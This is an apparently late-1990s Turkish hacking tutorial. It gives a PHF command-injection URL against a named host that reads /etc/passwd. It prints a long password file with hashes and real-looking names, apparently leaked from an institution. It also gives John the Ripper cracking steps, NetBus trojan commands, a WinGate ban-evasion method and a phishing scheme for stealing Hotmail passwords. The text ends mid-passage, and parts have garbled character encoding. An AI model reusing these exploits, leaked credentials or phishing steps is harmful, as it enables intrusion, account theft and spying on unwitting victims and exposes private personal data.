WEB hacking Buyrun By End and By Yutah
bilgidim kadari ile ilk kez 1996 da FBI in web sitesini
hack etmek icin
kullanilmis ve basarili olmustur. Tabi bu durum dan sonra FBI bu
hatasini gidermistir. Anlatacagim teknik
aslinda PHF olarak bilinir.Fakat
bir cok eski server da hala uygulanmakta ve netice alinabilmektedir
ozellikle japon
webcilerinde bu hataya cok rastlanilir ornek vermek
gerekirse:
http://www.mo.cs.tutsiki.ac.jp/cgi-bin/phf? Qalias=x%0a/bin/cat%20/etc/passwd">http://
www.mo.cs.tutsiki.ac.jp/cgi-bin/phf?Qalias=x%0a/ bin/cat%20/etc/passwd
http://www.mo.cs.tutsiki.ac.jp/cgi-bin/phf? Qalias=x%0a/bin/cat%20/etc/passwd">cat%20/etc/ passwd
Satirini
browserinize yazip enter e basin bu satir passwd
dosyasini acmaya
calisacaktir(adresi attim)
Error
404
/cgi-bin/phf
is not found on this server
Bu
satirlar
karsiniza cikarsa bilinki server yeni ve size gecit
vermiyor
Ama asagidaki
listeyi verirse bilinki
buldunuz ))
/cgi/phf?Qalias=x%0a/bin/cat%20/etc/
passwd
root:2fkbNba29uWys:0:1:Operator:/:/
bin/csh
www-admin:rYsKMjnvRppro:100:11:WWW
administrator:/home/Common/WWW:/bin/csh
asprilla:3A62i9qr.YmO.:1012:10:
lyutah
CAFER:/home/user/asprilla:/usr/
local/bin/tcsh
hasan:dvUMqNmeeENFs:1016:10:lois
figo:/home/user/hasan:/bin/csh
necmettin:ewF90K0gwXVD6:1006:
10:mehmet
CAFER:/home/user/cafer:/bin/csh
güloglu:kFph8HEM/aaAA:1007:10:Kemal
GULOGLU:/home/user/güloglu:/bin/csh
PHF teknigini
arkadaslarinizin web page larini hack etmek icin deniye bilirsiniz ))
tabi yukardaki satirlari
en iyi ihtimali goz onune alinarak
yazdim PHF bulsaniz bile muhtemelen shadow olacaktir yani asagidaki
gibi:
root:*:0:1:Operator:/:/bin/csh
www-admin:*:100:11:WWW
administrator:/home/Common/WWW:/bin/csh
asprilla:*:1012:10:CAFER:
/home/user/asprilla:/usr/local/bin/tcsh
hasan:*:1016:10:lois
figo:/home/user/hasan:/bin/csh
necmettin:*:1006:10:mehmet
CAFER:/home/user/cafer:/bin/csh
güloglu:*:1007:10:kemal
GULOGLU:/home/user/güloglu:/bin/csh
Bu
tek *
sifreleri kirdigini iddia eden bazi programlar var ama ben sadece
guluyorum shadowed kirmak bence imkansiz ama
yinede john the ripper i
cekip deneyebilirsiniz.Hic bir teknik % 100 netice vermez bunu
unutmayin.olaki bir shell aldiniz
veya kirdiniz diyelim en az
kullanilanini kullanin en son ne zaman kullanildigini anlamak icin shell
in ait oldugu servere
port 79 dan baglanin username ve pw i yazin en son
baglanilan tarihi size verir az kullanilan accountlari
kullanin
SERVERLARI
SASIRTMAK
Simdi size bir serveri nasil cildirtirsiniz onu anlaticam
Olaya gavurlar PORT SURF diyolar ...nedir
yaw bu port surf??
Annatiim imdi internete bagli her tip makinanin iletisim (data transferi)
yapabilmesi icin cesitli
portlar kullandigini biliyorsunuz(en azindan
ogrendiniz)bu portlar internete aciladn gediklerdir aslinda.
Baazi
portlar ve islevleri:
PORT23 log icin kullanilir
PORT25 e-mail yollamak icin
PORT80 web sayfalari icin
Tamam
bu kadar bilgi yeter sanirim cunku saymakla bitmez nesse nediyoduk
hah port surf iste size nasil yapilir onu anlatacam.
BÖLÜM
1 FIREWALL tespiti
DOS u acin ve
C:WINDOWS>tracert 152.163.199.42 (bu ip serverin ip si olmali ben
salladim)
Tracing
route to dns-01.aol.com [152.163.199.42]over a maximum of 30
hops:
1 * * * Request timed out.
2 150 ms 144
ms 138 ms 204.134.78.201
3 375 ms 299 ms 196 ms essek-cyberport.nm.westnet.net [204.134.78.33]
4 271 ms * 201
ms raks365.nm.org [129.121.1.3]
5 229 ms 216 ms 213 ms h4-0.cnss116.Turknet.t3.ans.net[192.103.74.45]
6 223
ms 236 ms 229 ms f2.t112-0.Gediz.t3.ans.net[140.222.112.221]
7 248 ms 269 ms 257 ms h14.t64-0.Izmir.t3.ans.net [140.223.65.9]
8
178 ms 212 ms 196 ms h14.t80-1.raks.net [140.223.65.14]
9 316 ms * 298 ms h12.t60-0.raks.net [140.223.61.9]
10
315 ms 333 ms 331 ms 207.25.134.18
11 * * * Request timed out.
12 * * * Request timed out.
13 207.25.134.189
reports: Destination net unreachable.
Gibi bi tablo karsimza cikicak .Tablo serverlar zincirini bize gosteriyo
bakin
13.Server varya iste o serveri tanimlayamadi nedeni muhtemelen
firewall
Bu demektirki ayni firmanin(orn superonline)bir
baska serverini
deniicez.Yalniz dikkat edilmesi gereken husus sinyal yolculugumuzun hangi
serverda bittigi hep ayni
server da bitiyosa bu demektirki bu server ana
server dir
Ikinci servere da tracert alalim
C:WINDOWS>tracert
198.83.210.28
Tracing route to dns-aol.ans.net [198.83.210.28]over a maximum of 30
hops:
1 * * * Request
timed out.
2 138 ms 145 ms 135 ms 204.134.78.201
3 212 ms 191 ms 181 ms turk.net [204.134.78.33]
4 166
ms 228 ms 189 ms raks365.nm.org [129.121.1.3]
5 148 ms 138 ms 177 ms h4-0.cnss116.gediz.t3.ans.net [192.103.74.45]
6
284 ms 296 ms 178 ms f2.t112-0.Izmir.t3.ans.net [140.222.112.221]
7 298 ms 279 ms 277 ms h14.t64-0.Istanbul.t3.ans.net
[140.223.65.9]
8 238 ms 234 ms 263 ms h14.t104-0.raks.t3.ans.net [140.223.65.18]
9 301 ms 257 ms 250 ms dns-raks.net
[198.83.210.28]
Trace complete.
Hehehe bakin bunda firewall falan yok hohohoyt temiz ve bakire(Isilay
Saygin
gibi) simdiiii sira geldi PORTSURF a....
Simdi telnetlerinizi acacaksiniz ve preferences te local echo kismini
tikleyin
baglanti olarak (yukardaki ornege gore 198.83.210.28)yazin(echo
tiklanmazsa win95 telnet ekraninda bisii goremezsiniz)
Connect
remote sysstemde telnet yazan menude daytime yi secin ve connect
olun size tarih saat ve zamani bildiren bir msg gelicek
tabbiki serverin
bash history sine kaydiniz gecicek sysadmin oha noluyo lam onune gelen
bizim servere girmis diicek
Hahahaha
adami cildirttiniz be ...
Daha ileri ve tehlikeli safhalarda port surf yapmak mumkun anlatirmiyim
bilemiyorum cunku
bu isler basinizi agritbilir benden soolemesi
vallaaaa(anlatacam) ))
Password Kýrma
Herhangi
bir ftp veya
..... gibi yerlere girilirken kullanýlan þifreler passwd
dosyasýna alegoritmatik
bir þekilde
kayýtlýdýr.Bu passwd dosyalarý ftp'nin veya
....'nýn
içinde bulunurlar.Ýþte bu da çok büyük bir
güvenlik boþluðu meydana getirdiðinden
dünyadaki çoðu
hackerlar,crackerlar..... bu güvenlik boþluðundan yararlanarak
kolay bir þekilde
istediklerine ulaþabilirler.
Passwd
mantýðý nedir?
Herhangi
bir passwd
dosyasýnýn içeriðine (edit,view)
baktýðýmýzda
aþaðýdaki gibi bir
metin görürüz:
root:U5SNZk2JeFyqc:0:0: root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0
ync:/sbin:/bin/sync
shutdown:*:6:0 hutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0
perator:/root:/bin/bash
man:*:13:15:man:/usr/man:
postmaster::14:12 ostmaster:/var/spool/mail:/bin/bash
cans:/uyl4V8zixlaE:501:220
evket Can:/home/nyt/cans:/bin/bash
canf nNSukj82XXEA:502:220:Ferhan CAN:/home/nyt/canf:/bin/bash
adem:F.3SJTjMEDcpU:503:240:Adem
Erdogan:/home/num/adem:/bin/bash
gurelil RABgVdC.Z2JA:504:220:Lutfiye Gureli:/home/nyt/gurelil:/bin/bash
acarkans:uddbZ9Mx98iKY:505:220
uheyla
Acarkan:/home/nyt/acarkans:/bin/bash
bekdemir nP07pY6gxPvQ:506:220:Nigar
Bekdemir:/home/nyt/bekdemir:/bin/bash
ayberst:HbDYSOFSXo83k:507:220:Timucin
Aybers:/home/nyt/ayberst:/bin/bash
kopuzb:JdYc5r.nfGaEY:508:220:Bayram Kopuz:/home/nyt/kopuzb:/bin/bash
aksita:Agisok05JXRrI:509:220:Ahmet
A. Aksit:/home/nyt/aksita:/bin/bash
cimcimk:Ai8r6m1xPcmMw:510:220:Kasif Cimcim:/home/nyt/cimcimk:/bin/bash
tanzer:FnlWFqrYfvVeo:511:240:Tanzer
Turker:/home/num/tanzer:/bin/bash
erkoly:Nc.Hq472OXz8k:513:230:Yilmaz Erkol:/home/kim/erkoly:/bin/bash
nyt:A04MMiSSbfAB2:514:220:NYT
Bolumu Resmi:/home/nyt/nyt:/bin/bash
borakf:GagTSqeRGJV.c:516:200:Fahir Borak:/home/cnaem/borakf:/bin/bash
uzmenr:0mZJYiyceKJeo:517:200:Resat
Uzmen:/home/cnaem/uzmenr:/bin/bash
yaylia:Jm9S5MLXd/R2M:521:220:Ahmet YAYLI:/home/nyt/yaylia:/bin/bash
ozaly:FfGyZIHjOqcoU:522:200:Yasar
OZAL:/home/cnaem/ozaly:/bin/bash
yasars:KizDcrryIQhzc:523:270 edat YASAR:/home/saf/yasars:/bin/bash
koksalg:GlDNRAsIGNjWQ:524:290:Guler
KOKSAL:/home/rbi/koksalg:/bin/bash
taylans:JnwMm9uPt76Rs:525:210 inan TAYLAN:/home/rea/taylans:/bin/bash
anach:WDkDAsL9FHR/U:526:210:Hakan
ANAC:/home/rea/anach:/bin/bash
akgunf:MiNaiGGyR1JG6:527:280:Fadil Akgun:/home/end/akgunf:/bin/bash
subasim:AndMbHdgb5H9.:529:300:Metin
Subasi:/home/fiz/subasim:/bin/bash
sungura:JoSjnOjcZqCtM:530:250:Ayse Sungur:/home/rif/sungura:/bin/bash
albayrak:IQJwi/qu0jTo2:531:220
erhan
Albayrak:/home/nyt/albayrak:/bin/bash
onera:Jbhdc51wn/WPw:532:201:Aysegul Oner:/home/cnaem/onera:/bin/bash
bayramy:AlZcxvhIRl6Xw:534:220:Yusuf
Bayram:/home/nyt/bayramy:/bin/bash
koksalm:InYyYaGxOichA:535:270:Muhsin Koksal:/home/saf/koksalm:/bin/bash
vakif:cc:536:400:TAEK
VAKFI:/home/taek/vakif:/bin/bash
seddighe:OgvuVQiGD/OGw:537:280:Emine Seddigh:/home/end/seddighe:/bin/bash
esenn GHW2392T48kw:538:280:Nur
Esen:/home/end/esenn:/bin/bash
yildizi:FfCwQga4b/LvY:539:220:Izzettin YILDIZ:/home/nyt/yildizi:/bin/bash
basolt:MoXAnj2yuDVCg:540:310:Toygun
Basol:/home/nel/basolt:/bin/bash
bodurn alDk8NzbfdoU:541:250:Nazan Bodur:/home/rif/bodurn:/bin/bash
bostanm:RSXR9GDBlOBTE:542:300:Melih
Bostan:/home/fiz/bostanm:/bin/bash
celebin:8QfdEi0/2EZv2:543:270:Nilgun Celebi:/home/saf/celebin:/bin/bash
dincerb:Ei11tpbbK9ops:544:230:Betul
Dincer:/home/kim/dincerb:/bin/bash
gultekin:J6faQXLhHvNEw:545:300:Ergun
Gultekin:/home/fiz/gultekin:/bin/bash
gungore:JkYdRn2X6ivv2:546:270:Emin
Gungor:/home/saf/gungore:/bin/bash
sahinh:mNnEblEi8oVz.:547:201:Hasan Sahin:/home/cnaem/sahinh:/bin/bash
ozturkn:Bd8dnZQjzddrk:548:230:Neset
Ozturk:/home/kim/ozturkn:/bin/bash
reyhanca:KGcikUdVikuvs:549:300:Atilla
Reyhancan:/home/fiz/reyhanca:/bin/bash
ngd:nn:550:400:Nukleer
Guvenlik Dairesi:/home/taek/ngd:/bin/bash
anaem:ccc:551:400:ANAEM:/home/taek/anaem:/bin/ bash
erduran:NgEavV94BD9VY:552:300:Nizamettin
Erduran:/home/fiz/erduran:/bin/bash
nhtg
xx:553:400:NHTG:/home/taek/nhtg:/bin/bash
rgd:zzz:554:400:RGD:/home/taek/rgd:/bin/bash
cnaem:ccc:555:200:CNAEM:/home/cnaem/cnaem:/bin/
bash
apakv:CpYe0oeGMCOdI:556:230:Vildan Apak:/home/kim/apakv:/bin/bash
bayulken:OcxNbtUuOttak:512:230 eval
Bayulken:/home/kim/bayulken:/bin/bash
ardagiln:BcclwAyDgYkYs:515:230:Nesrin
Ardagil:/home/kim/ardagiln:/bin/bash
karakell
gPmJbKoo/0TU:518:230:Bektas
Karakelle:/home/kim/karakell:/bin/bash
unala:HkbDXjJ3vJpV6:519:230:Unal Azakliogullari:/home/kim/unala:/bin/bash
yilmazy
pR/oJRp7PERQ:520:230:Yusuf Z. Yilmaz:/home/kim/yilmazy:/bin/bash
tekd:bbb:528:400:TAEK Teknoloji Dairesi:/home/taek/tekd:/bin/bash
necati:GkXn/ae.y8bKs:533:310:Necati
Kucukarslan:/home/nel/necati:/bin/bash
www:987:557:500:www
Users:/users/www:/bin/bash
akyols aF5UBFvEr7Bw:558:210 evgi AKYOL:/home/rea/akyols:/bin/bash
ozcinarb
d48qQhIJs0kA:560:270:Berna OZCINAR:/home/saf/ozcinarb:/bin/bash
sevdikb:OecxtOT03rKMA:561:210:Bulent Sevdik:/home/rea/sevdikb:/bin/bash
incem:IiYBQEI0ZpcOY:562:300:Mehmet
Zeki Ince:/home/fiz/incem:/bin/bash
kahraman:FS2OPYtiw49L6:563:270:Alper
Kahraman:/home/saf/kahraman:/bin/bash
varinlia:GfmjacT6ct6Fw:564:290:Ahmet
Varinlioglu:/home/rbi/varinlia:/bin/bash
altunh:5csmkn3uoCpyg:565:270:Hasret
ALTUNKAYA:/home/saf/altunh:/bin/bash
yilmazf:IE.EN2vUu41HU:566:270:Fatma YILMAZ:/home/saf/yilmazf:/bin/bash
kutd:Fc7lvTDNhJYYQ:567:280
eniz KUT:/home/end/kutd:/bin/bash
tacacs anHMVraPXPA.:1500:400::/home/tacacs:/bin/bash
admin R0HTvLEIhtSM:1499:0:Administrator:/home/admin:/
bin/bash
arpadt:OivHOGPoX1IAU:570:270:Tulin ARPAD:/home/saf/arpadt:/bin/bash
vurale:HjNyW9EI.woao:569:210:Ertac VURAL:/home/rea/vurale:/bin/bash
isyara:OlYWR.EcdVdKU:571:210:Arif
ISYAR:/home/rea/isyara:/bin/bash
uzonuro:AaABahtiOEo6A:572:210:Onur UZONUR:/home/rea/uzonuro:/bin/bash
yilmazer:NdQM4Rux/7iT2:210:210:Ayhan
YILMAZER:/home/rea/yilmazer:/bin/bash
bahcecig:AhfABAP0XgS0k:573:210:Gulfem
BAHCECI:/home/rea/bahcecig:/bin/bash
koth:AjVcf4ywDlr3w:574:210:Halil
KOT:/home/rea/koth:/bin/bash
elberk:IlBiB9Glgycn.:575:210:Kamil ELBER:/home/rea/elberk:/bin/bash
yasard:VvVMMfuQ4cMRM:576:270
ogan YASAR:/home/saf/yasard:/bin/bash
nyts97:7U3sUENdky6JU:577:220:NUKLEER YAKIT
SEMPOZYUMU:/home/nyt/nyts97:/bin/bash
yonetici
LSMMkABUJ7ic:0:0:Bilgisayar Yoneticisi:/root:/bin/bash
gungorn:dnwkv/5qByrG.:568:290:Nurdan GUNGOR:/home/rbi/gungorn:/bin/bash
bingolda:76l9JUAaRzDoo:578:280:Murat
BINGOLDAG:/home/end/bingolda:/bin/bash
can:LfbBn4bgycs7o:559:100
evket Can:/home/can:/bin/bash
saricams NNbo8vGVmu3Y:579:280 erdar
SARICAM:/home/end/saricams:/bin/bash
bassaria:AfgztlGy2RQJs:580:280:Asiye
BASSARI:/home/end/bassaria:/bin/bash
webadmin:Hc5/aIVU/XuuE:581:500:WEB ADMINISTER:/home/webadmin:/bin/bash
ekincis:CjiBia7MbWbs.:582:280
inasi EKINCI:/home/end/ekincis:/bin/bash
aksum:EjFB5hSVLq7Nk:583:280:Mehmet AKSU:/home/end/aksum:/bin/bash
akyuzt:ChgnRmxYcdEuc:584:280:Tanil
AKYUZ:/home/end/akyuzt:/bin/bash
karahang:GgJGJA8ospSqU:585:270:Gursel
KARAHAN:/home/saf/karahang:/bin/bash
topcuo:NibHkZNNL/IH6:587:290
ayhan TOPCUOGLU:/home/rbi/topcuo:/bin/bash
kurtcebe:Jk/kUfYoDiUP6:588:280:Tekin
KURTCEBE:/home/end/kurtcebe:/bin/bash
ozturkh:AeyVxXMofhxoU:589:310:Hamza
OZTURK:/home/nel/ozturkh:/bin/bash
dogruozm:CjKo7YL/IvXZo:590:280:Mustafa
DOGRUOZ:/home/end/dogruozm:/bin/bash
karainci
m3sh7Ih56T7Y:591:280:Nihat
KARAINCI:/home/end/karainci:/bin/bash
info:Bjt9LmUnKpWr6:592:100:CNAEM Information:/home/cnaem/info:/bin/bash
cezzar:Eg/sn2Q/pXsCg:593:290:Rezzan
KUCUKCEZZAR:/home/rbi/cezzar:/bin/bash
tasdelen:A2afZOosjl7xk:594:270:Muslum
TASDELEM:/home/saf/tasdelen:/bin/bash
kocakm:eV51wNMJ9CpM2:595:270:Mehmet
KOCAK:/home/saf/kocakm:/bin/bash
-----------------
Yukarýdaki metinden alýnmýþ
rasgele
bir satýrýn açýklamasý :
Örnek satýr :
canf nNSukj82XXEA:502:220:Ferhan
CAN:/home/nyt/canf:/bin/bash
Kullanýcý
adý(user) : canf
Kodlanmýþ
Password : DnNSukj82XXEA
Kullanýcý numarasý : 502:220
Kullanýcý
ismi : Ferhan CAN
Dizin : /home/nyt/canf
Türü : /bin/bash
Yukarýda
anlaþýldýðý
gibi herþey apaçýk
ortada fakat bir sorun var.O da kodlanmýþ password.Bu kodu
nasýl
çözüp de þifreyi alacaksýnýz.Cracker Jack
veya John The Ripper gibi cracker programlarýyla
yapacaksýnýz.
Benim tavsiyem John The Ripper
kullanmanýz.Çünkü kullanýmý basittir ))
Not:
Bu arada shadowed
denilen bir olay daha vardýr.Bu da aþaðýdaki
gibidir :
Örnek
satýr 1 :
canf::502:220:Ferhan CAN:/home/nyt/canf:/bin/bash
Örnek satýr 2 :
canf:*:502:220:Ferhan
CAN:/home/nyt/canf:/bin/bash
Kullanýcý adý(user)
KodlanmýþPassword
Kullanýcý no
Kullanýcý ismi Dizin
Türü
canf
; ;
502:220
Ferhan CAN /home/nyt/canf
/bin/bash
canf
;
*
502:220
Ferhan CAN /home/nyt/canf
/bin/bash
Gördüðünüz
gibi
kodlanmýþ password bölümü ya boþ
býrakýlarak ya da * ve x
iþareti kullanýlarak
gölgelenmiþtir yani shadowed edilmiþtir.Bu tür þifreleri
kýramazsýnýz.
Passwd
dosyalarýný kýrma Tavsiyem John The Ripper olduðu
için bu programýn
kullanýmýný
anlatacaðým.
1) Wordlist metodu ile
kýrma
Bu metodla
kýrarken kullandýðýnýz wordlistin içinde
bulunan
kelimeler denenir.
Kullanýmý
: john -w:
Örnek : john
passwd.txt -w:words.lst
2)Brute
force attack
metodu ile kýrma
Bu metod çok uzun
sürecektir.Çünkü John belirttiðiniz minimum-maximum
arasý bütün
kombinasyonlarý deneyecektir. Önce John amcanýn
kýrarken kullandýðý
birkaç yöntemi bilelim :
ALL :
Hepsi -
ALPHA : Sadece harfler
-
DIGITS : Sadece
rakamlar
Not:
Türkiye'de
süperonline dýþýndaki bütün isslerde min=4 max=8 hane
olduðundan
kýracaðýnýz þifre
süperonline deðilse aþaðýda
belirttiðim gibi
yapýn.
Öncelikle John The
Ripper'ýn bulunduðu kalsörün
içindeki john.ini
dosyasýný açýn ve bu dosyanýn editine girin.
Ve yukarýda
belirttiðim gibi kýrarken kullanmak
istediðiniz yöntemi seçin.Ben þimdi ALL seçtiðinizi
varsayýyorum.John.ini
dosyasýnýn editinden ALL
bölümünü bulun.Hemen altýnda MinLen = 1 ve MaxLen = 8 gibi
yazýlar
göreceksiniz.Tavsiyem MinLen'i 4 yapmanýz.Adamlar
enayimi 1 haneli þifre koycak ))Gerekli deðiþikliði
yaptýktan
sonra kaydedip çýkýn ve ms-dos
satýrýna geçin.Ve daha sonra :
Kullanýmý
:
john
kýracaðýnýzdosya -i:kýrmayöntemi
Örnek :
john passwd.txt
-i:ALL
3)Single metodu
Bu metodla
kullanýcý adý ve kullanýcý
bilgileri
sýrayla kýrýlýr.. Doðum
tarihlerini,isim-soyadlarýnýn
çeþitli
kombinasyonlarýný þifre olarak kullananlarý
kýrmak
için bu metod þiddetle tavsiye edilir.
Ör =>
Cobratti Sanane : Cobras,Scobra...gibi
Kullanýmý
: john -single
Örnek :
john -single passwd.txt
DÝKKAT!!! : Bütün bu yöntemlerde kýrýlan
þifrelerin
diziliþ formatý þöyledir :
password (username) => þifre
(kullanýcý
adý
Netbus
Pc sistemlerine girmemizi
saglayan bir program. Backorrifice ve master
paradiese kadar çok islevi
olmasa bile basitligi ile oldukça basarili. Programin server dosyasinin
karsi pc de açildikdan
sonra pc ye girebilirsiniz. Ama netbus artik çok
duyuldu ve server dosyasi (patch.exe) yi artil herkes icon undan yada
boyutundan
taniyor bu yuzden isiniz oldukça zor ilerde netbus un server
dosyasini diger dosyalara bulastirmayi da anlatacagim.
Simdi
indirmis oldugunuz netbus paketindeki dosyalari taniyalim
Netbus.exe : Bizim pc ye saldirmak için kullanacagimiz yazilim.
Patch.exe
: Karsi pc ye yollanmasi gereken server programi
Host : Listemize kaydetmis oldugumuz, eklemis oldugumuz ip numaralari
bu
dosyanin içine yazilir. Ilk aldigiunizda bu dosya olmayacakdir sonradan
olusur.
Temp.jpg: Karsi pc nin o anki
goruntusunu screendump yaparak cekmis
oldugumuz resimler ilk olarak boyle kaydedilir. Eger bi sefer yaptikdan
sonra
dosyanin yedegini almazsaniz bi sornaki goruntude onun uzerine
yazilir.
Netbusdaki komutlar ve gorevleri
Open Cdrom:
Cdrom u açar,kapatir
Show image: Resim dosyalarini gösterir
Swap Mouse: Mouse cursor unu gostermez-geri açar
Start
Program: Karsi pcdeki bi programi çalistitir.
Msg Manager: Mesaj Yollarsiniz. (hata mesajlari)
Screendump: O anki karsi
pc nin ekran goruntusunu jpg olarak pcnize atar.
Get Info: Patch in nerde oldugu ve karsi pc de kaç kisinin daha oldugunu
gösterir.
Port
Redirect: Port u degistirir.
Play Sound: Ses dosyasi çalistirir.
Exit Windows: Windows'u kapatir-Reset attirir-Askiya
alir.
Send Text: Mesaj yollamanizi saglar
Active Winds: O anki aktif programlari gosterir.
Mouse pos: Mouse elegecirir..
Listen:
Karsidakinin ne yazdigini gösterir
Sound System: Karsi pcnin ses ayarlari ile hasir nesir olabilmek için.
Server Setup:
Ayar olayi.
Control Mouse: Mousu ele geçirir.
Go to Url: Sizin istediginiz urlye yollar karsidakini
Key Manager:
Klavyeyi kitler-açar
File Manager: Dosya yollamak,almak için
IRC
'DE NASIL BANLANMAZSINIZ IP SPOOOF
Wingate
ile IP spoofing
yapin BAN ve K-Line'lardan ve Tabiki Oplardan Korkmayin!!!!
Wingate internet cafelerde, sirketlerde
ve bunun gibi bircok bilgisayari
birbirine baglayan yerlerde kullanilan
bir protokoldur. Tabii bizim ilgilendigimiz
bolumse wingate'in 23. portu.
Bu 23. portu kullanarak
IRC de Op lar tarafindan BAN'lansek, K-Line koysalar ve hatta
Domain
yapsalar bile istedigimiz
kanala rahatca girebiliriz. Wingate' in bir diger ozelligi ise NUKE yeme,
ekranin
kararmasina, hattan
dusmeye son veriyo kesinlikle wingate yaptiktan sonra NUKE yemek yok!!!
WinGate>
Ilk yapmamaiz
gereken sey once 23. port'u bulan yani bos wingate serverini
bulan WingateScan
programini cekmek. Bu kullanilmasi oldukca
basit bir program irc'de
gordugunuz ip'leri buraya yaziyosunuz ve o kendiliginden wingate servery
buluyor
Mesela:
Mirc ekraninda Phiber_Optik join zurna from 212.55.66.98' diye
kimin nerden baglandigini
gosteren yazilar gecer hemen
burdaki ip numarasini 212.55.66.98 'i
wingateScan progrminda
IP yazan bolume giriyoruz WingateScan programi 212.55.68.00'dan
212.55.66.255'
e
kadar olan bolumde wingate serverini arar ve diyelimki 212.55.68.155'te
wingate
buldu assagidaki server found bolumunde
hemen cikar!
Mirc'i aciyoruz karsimiza cikan beyaz sayfada
/server 212.55.68.155:23
yaziyoruz ve karsimiza Wingate
diye bi yazi cikacak daha sonra yine
bitakim yazilar cikacak
/quote user xxxxx xxxxx
mail@neyazarsanyaz.com xxxxx xxxxx
diyoruz burda xxxxx lerin hicbir onemi yok lakin user yazmayi sakin
unutmayin
daha sonra yine bitakim
yazilar cikacak ardindan
/quote nick PhiberOptik
Benim nickim PhiberOptik oldugu icin yazdim sizin nickiniz ne ise onu
yazin
ve enter'layin
yine bitakim yazilar cikacak hic onemli degil daha sonra girecegimiz irc
serverini yaziyoruz mesela Raksnet
olsun
/quote irc.raksnet.com.tr:6666
yazarak irc serverina baglaniyoruz simdi biraz hizli davranmamiz gerekiyo
daha
onceden
yazdigimiz /quote user xxxxx xxxxx
mail@neyazarsanyaz.com xxxxx xxxxx
keyboard'taki oklari kullanrak buluyoruz ve enter'liyoruz ve ardindan
/quote nick PhiberOptik(Nick neyminiz
herneyse)
yine oklarin yardimiyla onu buluyoruz ve enterliyoruz ve ensonunuda
BAN'landigimiz, K-Line yedigimiz
Domain
koyduklari IRC'deyiz isterseniz sizi BAN'liyen Op'a bi isaret cakin
kil olsun ibne!!!
Unutmadan eger wingate bulduysaniz
o numarayi bi yere yazin cunku
wingateler ayni sira dizininde bulunur mesela: Bizim buldugumuz wingate
ip'si 212.55.66.155'di.
Bi daha ki gun o atiyorum
212.55.66.40 olur yani ayni dizinde bulunur her seferinde ugrasmamaniz
icin yazmanizi tavsiye
ederim!!!
Simdide Size bir arkadasimizdan E-mail'le aldigim nacizane bir fikri
anlatmak istiyorum isin esas mantigi
yukarida anlattigim gibidir! Ve simdi
isi cok daha basite indirgeyerek yapacagiz, yine 23. porttaki wingate
ip'mizi
buluyoruz mirc'i acip setuplardan Firewall bolumune giriyoruz Use
Socks firewall'i tikli olarak birakiyoruz ve Socks 4'u
seciyoruz Hostname
yazan bolume buldugumuz wingate ip'i yaziyoruz User id ve Password'u bos
birakip port'u 1080 olarak
seciyoruz Initiate DCCs trough firewall
seceneginide tikli birakip connect yapiyoruz! Kendinize /dns veya /whois
cekin
ip'inizin farkli oldugunu goreceksiniz
HOTMAIL HACK
Microsoft'un ünlü
ücretsiz e-mail sitesi
hack edildi. Nasil mi oluyor?
Kurbana Javascript codu
iceren bir e-mail attiyorsunuz.Kurban bu e-mail'i görüntüledigi
zaman
Javascript kodu devreye giriyor ve Kurbana tekrar Login olmasini
söylüyor.Tabii böyle olunca size kurbanin kullanici
adi ve ip adresini
iceren bir e-mail geliyor.Tabii siz kullanici adini ve sifresini
ögrendiginiz zaman hesabin tam kullanin
hakkini kazaniyorsunuz.silmek,
okumak, kurban adina mailler göndermek... Tabii siz bos durmayip POP
Mail'leride kontrol
ediyorsunuz ve kurbanin diger sitelerdeki hesaplarinin
sifrelerini aliyorsunuz.
Peki bu olaydan
kurtulamayacagiz
mi ??? .
Netscape kullanicilari
javascript ayarlarini söyle kapatabilir. (edit / preferences / advanced /
disablejavascript).
Microsoft
Internet
Explorer kullanicilari jscript ayarlarini su sekilde kapatabiliir. (view /
internet options /security / custom
settings / scripting / disable active
scripting).
Tabii En Önemlisi
Baskasinin Hotmail Hesabini Nasil Ele Geciririz
???
Asagidaki Listedekiler
elimizde olmali.
1 Internete bagli bir
bilgisayar... eh yani )
1 Netscape
Mail (veya
herhangi bir e-mail programi)
1 Notepad (veya herhangi
bir text editor)
1.ADIM:hotmail.com
sitesini
ziyaret ediyoruz ve ücretsiz bir e-mail hesabi actiriyoruz. Formu
doldururken gercek bilgilerimizi vermemize gerek yok.
Rastgele birseyler
yazsakta olur.
2.ADIM:Geocities.com
sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabi
actiriyoruz. Formu
doldururken gercek bilgilerimizi vermemize gerek yok. Rastgele birseyler
yazsakta olur.1.adimda e-mail
adresini kullandik.ve geocities'ten bir
e-mail adresi aldik.örnegin(ybwc@geocities.com).
3.ADIM:NotePad'imizi
aciyoruz
ve asagidaki text'i yaziyoruz. Daha sonra message.htm ismini
verip kayit ediyoruz. Satir 17'de Geocities kullanici adimiz
yaziyor.
(ybwc) 2.adimda belirttigimiz gibi. (bu kullanici adini kendinize göre
degistirin.)
4.ADIM:kurbanizima
yeni
bir e-mail mesaji hazirlayip gönderiyoruz.örnegin: kurban,
(victim@hotmail.com)olsun. E-mailimize message.htm dosyasinida
ekliyoruz
ve gönderiyoruz.
5.ADIM:Kurbanimizin
e-mailini kontrol etmesini bekliyoruz. Kurban bizim e-maili görüntüledigi
zaman
Geocities'teki mailimizi kontrol ediyoruz. Geocities2ten bir mail
aliyoruz. Tabii bu mail'de kurbanimizin kullanici adi,
sifresi ve ip
adresi oluyor...
Net
Split
Eðer IRC'ye bir süre
takýlýdýysan
netsplit denen þeyden az çok
haberin vardýr. Netsplit olduðu zaman yüzlerce kiþi
birden
quit msg verir ve kanallarý terk eder. En geç 1-2 dakkika
içinde bu þahýslarýn
hemen hepsi geri gelir. Herkes
buna sebep olan olaya netsplit der. Evet doðru, buna netsplit denir,
ama bu iþ
burada bitmez. Ben sana netsplitin derinliklerini, neden
gerçekleþtiðini anlatacaðým.
Gerçekten de ilginç
bulacaðýna eminim.
Chat edebilmek için
birçok net mevcut. Ör: Dalnet,
Undernet, Cobranet, Xnet, Webnet vs.. Bu
netlerin dünya üzerinde çeþitli yerlerde serverlarý mevcut.
Mesela
15 server amerikada, 10 tane avrupada... gibi. Sen chat etmek
istediðinde bu netlerden birine, daha sonra da netleri
oluþturan
serverlardan birine baðlanýrsýn. Ör: Dalnet'in
ced.se.eu.DAL.net serverý
